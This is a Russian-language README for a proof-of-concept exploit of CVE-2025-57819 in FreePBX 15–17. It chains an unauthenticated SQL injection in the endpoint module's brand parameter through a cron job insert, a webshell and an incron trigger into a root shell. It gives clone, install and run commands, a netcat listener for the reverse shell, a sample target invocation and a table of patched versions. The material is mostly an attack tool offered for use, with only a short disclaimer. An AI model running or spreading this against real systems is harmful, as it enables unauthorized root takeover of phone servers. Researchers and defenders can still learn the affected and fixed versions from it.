
Полная цепочка CVE-2025-57819 PoC для FreePBX 15, 16 и 17: неавторизованная SQL-инъекция до RCE и захвата root.
Полноценный PoC для CVE-2025-57819. Неаутентифицированная ошибка на основе SQL-инъекции в модуле endpoint FreePBX, которая превращается в root shell через внедрение cron-задания и повышение привилегий с помощью incron.
Только для авторизованного тестирования и исследований. Не используйте против систем, которые вам не принадлежат.
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
/admin/ajax.phpasteriskfwconsole от имени rootgit clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]
Сначала запустите слушатель:
nc -lvnp 9999
Затем запустите:
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
--cleanup удаляет веб-шелл и cron-задание после эксплуатации.
FreePBX с установленным модулем endpoint. Параметр brand в /admin/ajax.php передается без санитизации в SQL-запрос.
| FreePBX | Исправленная версия |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev